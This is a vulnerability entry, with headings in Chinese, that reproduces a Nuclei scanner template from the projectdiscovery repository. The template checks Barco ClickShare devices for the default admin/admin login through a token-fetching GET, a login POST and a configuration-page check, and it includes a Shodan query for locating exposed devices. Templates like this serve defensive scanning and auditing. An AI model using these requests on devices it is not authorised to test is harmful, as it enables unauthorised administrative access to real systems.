barco-clickshare-default-login: Barco ClickShare - Default Login

漏洞描述

Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found.

PoC代码[已公开]

id: barco-clickshare-default-login

info:
  name: Barco ClickShare - Default Login
  author: ritikchaddha
  severity: high
  description: |
    Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found.
  classification:
    cpe: cpe:2.3:o:barco:clickshare_cs-100_huddle_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: barco
    product: clickshare_cs-100_huddle_firmware
    shodan-query: "ClickShareSession"
  tags: default-login,barco,clickshare,vuln

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login/log_me_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_protection_token={{token}}&username={{username}}&password={{password}}&eula_accepted=true
      - |
        GET /configuration_wizard HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 303 || status_code_2 == 302'
          - 'contains(body_3, "ClickShare Configuration Wizard")'
          - 'contains(location_2, "/dashboard")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - '="csrf_protection_token" value="([0-9a-z]+)" \/>'
        internal: true
# digest: 4a0a00473045022100e15d5b5366ea779fe5e4b1e83229b7abe635448cb3a8ade3ddae9a7e7055dd46022047eadc94f41ed7592d60c0d0df79e21a8a5feead9998a8fff744e3a0b19c8b18:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/barco-clickshare-default-login.yaml